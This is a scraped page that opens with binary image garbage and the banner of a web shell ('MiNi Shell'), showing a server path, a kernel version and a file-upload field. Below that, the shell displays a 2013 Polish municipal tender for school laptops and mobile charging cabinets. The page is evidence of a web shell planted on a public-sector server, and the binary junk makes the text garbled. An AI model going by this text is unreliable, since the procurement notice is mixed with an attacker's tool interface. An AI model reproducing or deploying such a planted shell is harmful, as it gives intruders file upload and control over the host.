JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130731/153279-N-2013.html

<p class="kh_header"><b>Rędziny: DOSTAWA  FABRYCZNIE  NOWEGO SPRZĘTU KOMPUTEROWEGO
I SZAFEK MOBILNYCH DLA SZKÓŁ PODSTAWOWYCH I GIMNAZJÓW
Z TERENU GMINY RĘDZINY. ZAMAWIAJĄCYM JEST SZKOŁA PODSTAWOWA im. M. Konopnickiej  W KONNIE ul. KIELECKA 37</b><br>
<b>Numer ogłoszenia: 153279 - 2013; data zamieszczenia: 31.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Wolności 87, 42-242 Rędziny, woj. śląskie, tel. 034 3279014, faks 034 3279085.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.redziny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA  FABRYCZNIE  NOWEGO SPRZĘTU KOMPUTEROWEGO
I SZAFEK MOBILNYCH DLA SZKÓŁ PODSTAWOWYCH I GIMNAZJÓW
Z TERENU GMINY RĘDZINY. ZAMAWIAJĄCYM JEST SZKOŁA PODSTAWOWA im. M. Konopnickiej  W KONNIE ul. KIELECKA 37.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA  FABRYCZNIE  NOWEGO SPRZĘTU KOMPUTEROWEGO
I SZAFEK MOBILNYCH DLA SZKÓŁ PODSTAWOWYCH I GIMNAZJÓW
Z TERENU GMINY RĘDZINY
Wymagania techniczne  sprzętu komputerowego
i szafek mobilnych dla szkół podstawowych i gimnazjów
z terenu GMINY RĘDZINY

Parametry techniczne notebooków
1.	Procesor - Intel Core i5-3210M (2 rdzenie)
2.	Pamięć RAM - min. 4 GB (SO-DIMM DDR3, 1333 MHz)
3.	Dysk twardy - 320 GB SATA 5400 obr.
4.	Wbudowane napędy optyczne - nagrywarka DVD, RW
5.	Przekątna ekranu - 15,6cali
6.	Karta graficzna - zgodna z DirectX 11
7.	Wielkość pamięci karty graficznej - min. 1024 MB GDDR3 (pamięć własna)
8.	Zainstalowany czytnik kart pamięci - 1 szt.
9.	Wbudowane głośniki stereo
10.	Wbudowany mikrofon
11.	Wbudowana kamera internetowa
12.	Zintegrowana karta dźwiękowa
13.	Wi -Fi 802.11 b,g,n
14.	LAN 10-100-1000 Mbps

Rodzaje wyjść i wejść:      
1.	Bluetooth
2.	DC-in (wejście zasilania) - 1 szt.
3.	VGA (D-sub) - 1 szt.
4.	HDMI - 1 szt
5.	RJ-45 (LAN) - 1 szt.
6.	USB 2.0 - 2 szt
7.	USB 3.0 - 1 szt.
8.	Wejście mikrofonowe - 1 szt.
9.	Wyjście słuchawkowe i głośnikowe - 1 szt.

Dołączone oprogramowanie: 
1.	Microsoft Windows 7 Home Premium PL (wersja 64-bitowa)
2.	Nośnik z systemem MS Windows 7 Home Premium PL 64 bit
3.	Program do monitorowania pracy ucznia:
a. kompleksowa ochrona dostępu do Internetu z klasyfikacją treści oraz blokadą informacji niepożądanych możliwość samodzielnego wskazania stron www i aplikacji które mają zostać zablokowane
b. kontrola czasu spędzanego przy komputerze
c. automatyczne wykonywanie zrzutów ekranowych
d. kontrola i wyłączanie komunikatorów, programów edycji rejestru, programów p2p	

Dodatkowe informacje:
1.	Sterowniki do systemu Windows
2.	Wydzielona klawiatura numeryczna
3.	Możliwość zabezpieczenia linką (port Kensington Lock)
4.	Wielodotykowy, intuicyjny touchpad.

Dołączone akcesoria:
1.	Zasilacz
2.	Bateria min. 4400 mAh
 
Szafka mobilna

Szafka mobilna (na kółkach) umożliwiająca przechowywanie  komputerów przenośnych (opisanych powyżej) i ładowanie ich baterii. Każdy z notebooków musi znajdować się w oddzielnej przegrodzie. Wewnątrz korpusu wózka zamontowana listwa zawierająca gniazda elektryczne do podłączenia ładowarek laptopów. Drzwi wózka zabezpieczone zamkiem na klucz. 
Szafka posiadająca atesty i klasyfikacje zgodne z Rozp. MSWiA z 21.04.2006 r w sprawie ochrony 
przeciwpożarowej budynków dot. miejsc użyteczności publicznej. Szafka musi posiadać Deklarację 
CE oraz certyfikat ISO9001 dla producenta sprzętu.


Certyfikaty i Bezpieczeństwo:

1.	Certyfikat ISO9001:2000 dla producenta sprzętu (załączony do oferty)
2.	Certyfikat ISO 14001 dla producenta sprzętu (załączony do oferty)
3.	Deklaracja zgodności CE (załączona do oferty)


OGÓLNE

Gwarancja: 
Na notebooki - min. 24 miesiące
Na szafy mobilne - min. 24 miesiące.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.00.00-0, 30.23.31.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający  żąda  wniesienia  wadium.
2.Dostawca zobowiązany jest wnieść  wadium w  wys.  6.000,00 zł  (słownie: sześć  tysięcy złotych) .
3.Dostawca  obowiązany  jest wnieść wadium przed upływem terminu składania ofert - tj w  terminie  do dnia  8 sierpnia   2013 r do godz. 9:oo.  w sekretariacie Urzędu Gminy Rędziny.
4.Wadium może być wniesione w jednej lub kilku następujących  formach :
a)przelewem na rachunek  bankowy Szkoły Podstawowej w Koninie  nr :  

PKO II O/Częstochowa   nr  63 1020 1664 0000 3902 0028 3382 

Za  termin wniesienia wadium w formie pieniężnej zostaje przyjęty termin uznania jego rachunku - tzn. :   data  wpływu środków na rachunek Zamawiającego musi być wcześniejsza niż termin składania ofert.    Niedopełnienie powyższego  spowoduje  odrzucenie  oferty.
b)poręczeniach bankowych  lub  poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych ;
d)gwarancjach ubezpieczeniowych ;
e)poręczeniach udzielanych przez podmioty o których mowa art. 6b ust.5 pkt.2 ustawy z dnia 9.11.2000r. (Dz. U. z 2007r nr 42 poz. 275) o utworzeniu P.A.R.P.
5.W przypadku  złożenia przez Dostawców  wadium w formie,  o której  mowa w  pkt. 4 ppkt.  b, c, d, e, - Dostawca zobowiązany jest włączyć do oferty kopię dokumentu gwarancji   potwierdzoną za zgodność z oryginałem, a oryginał tego wadium osobno dołączyć do oferty. 
6.Dostawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania z ofertą.
7.Zamawiający  zwróci  niezwłocznie wadium wg zasad określonych w art. 46 ustawy PZP.
8.Zamawiający  zatrzymuje wadium wraz z odsetkami - wg zasad określonych  w art. 46 ust.5  ustawy PZP.
9.Zamawiający nie wyraża zgody na inne  formy  wnoszenia  wadium.
10.Zwrot wadium
 10.1.  Zgodnie z art. 46 ust.1 ustawy Pzp Zamawiający zwraca niezwłocznie wadium, jeżeli:
a.  upłynął termin związania ofertą; b.  zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy;
c. Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
10.2.    Z zastrzeżeniem ust. 4a ustawy Pzp, Zamawiający zwraca niezwłocznie wadium na wniosek Dostawcy: 
                  a.   który wycofał ofertę przed upływem terminu składania ofert;
                  b.   który został wykluczony z postępowania;
                  c.   którego oferta została odrzucona.
        11.  Utrata wadium
11.1	  Zgodnie z art. 46 ust. 5 PZP Zamawiający zatrzymuje wadium wraz z odsetkami,  jeżeli   
      Wykonawca, którego oferta   została wybrana:
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
                    b.   nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
                    c.  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn  
                         leżących po stronie Dostawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca jest zobowiązany wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o zamówienie w  okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia  działalności jest krótszy - w tym okresie,  wykonał i dostarczył co najmniej dwie  dostawy fabrycznie  nowego sprzętu komputerowego  porównywalnego parametrami  technicznymi, wielkością i jakością (nie mniejszymi) w  zakresie dostawy sprzętu  komputerowego o wartości co najmniej  200.000 zł  brutto każda.   
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są  przedłożyć wykaz  dostaw  wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,wraz z podaniem ich rodzaju i wartości, daty i miejsca  dostawy oraz załączeniem  dowodów dotyczących , że zostały wykonane prawidłowo ukończone wg wzoru stanowiącego załącznik nr 6  do SIWZ. Zamawiający za najważniejsze uzna te, które potwierdzają spełnienie przez  Wykonawcę warunku udziału w postępowaniu w zakresie wiedzy i doświadczenia.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
postępowaniu na dzień składania ofert na podstawie złożonych wraz z ofertą oświadczeń  i dokumentów wg metody -spełnia nie spełnia .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca jest zobowiązany wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca jest zobowiązany wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca jest zobowiązany wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty - zgodnie z pkt.1 rozdziału IX siwz.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.   Zamawiający - kierownicy placówek oświatowych zawierają umowę w sprawie zamówienia  publicznego w formie pisemnej w  terminie nie krótszym niż 5 dni od dnia przekazania zawiadomienia o  wyborze oferty.  
2.   Wszystkie istotne postanowienia umowy, wraz z wysokością kar umownych z tytułu  niewykonania lub nienależytego wykonania umowy oraz ze szczegółowym zakresem  obowiązków Dostawcy związanych z realizacją przedmiotu zamówienia zawarte zostały w projekcie umowy (zał. nr 1 do SIWZ).
 3. Dostawca akceptuje treść projektu umowy na wykonanie przedmiotu zamówienia, stanowiący załącznik do niniejszej SIWZ.
 4. Zamawiający - kierownicy placówek oświatowych przewidują możliwość wprowadzenia zmian w treści  umowy w przypadku  zaistnienia okoliczności niemożliwych do przewidzenia w dniu zawarcia umowy a w  szczególności w przypadku zaistnienia następujących okoliczności:
4.1   Wystąpienia konieczności zmiany terminu realizacji robót ze względu na:
        -  konieczności wykonania elementów i  prac dodatkowych;
        - klęską żywiołową;
        -  siłę wyższą 
 4.2     Wystąpienia  konieczności zmiany terminu realizacji umowy,  
 4.3      Wystąpienia zmiany ceny brutto - w przypadku obowiązującej stawki podatku VAT.
   5.    Zamawiający - kierownicy placówek oświatowych przewidują możliwość dokonania zmian Postanowień   zawartej umowy w stosunku do treści oferty w sytuacji:  
        5.1   zmiany przepisów powodujących konieczność zastosowania innych rozwiązań niż zakładano w  opisie przedmiotu zamówienia; 
        5.2   zmiany osób reprezentujących w przypadku zmian organizacyjnych;
  6.     Zamawiający - kierownicy placówek oświatowych przewidują możliwość dokonania innych zmian umowy, pod warunkiem,  że  konieczność wprowadzenia takich zmian wynika z okoliczności, których  nie  można było przewidzieć w chwili zawarcia umowy, a zrealizowanie założonego pierwotnie  celu   umowy byłoby bez tych zmian niemożliwe lub zmiany te są korzystne dla   Zamawiającego -  kierownika  placówki oświatowej.
  7.     Każda zmiana musi być uzgodniona i wprowadzona aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.redziny.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Rędziny, ul. Wolności 87, 42-242 Rędziny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2013 godzina 09:00, miejsce: Sekretariat Urzędu Gminy Rędziny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com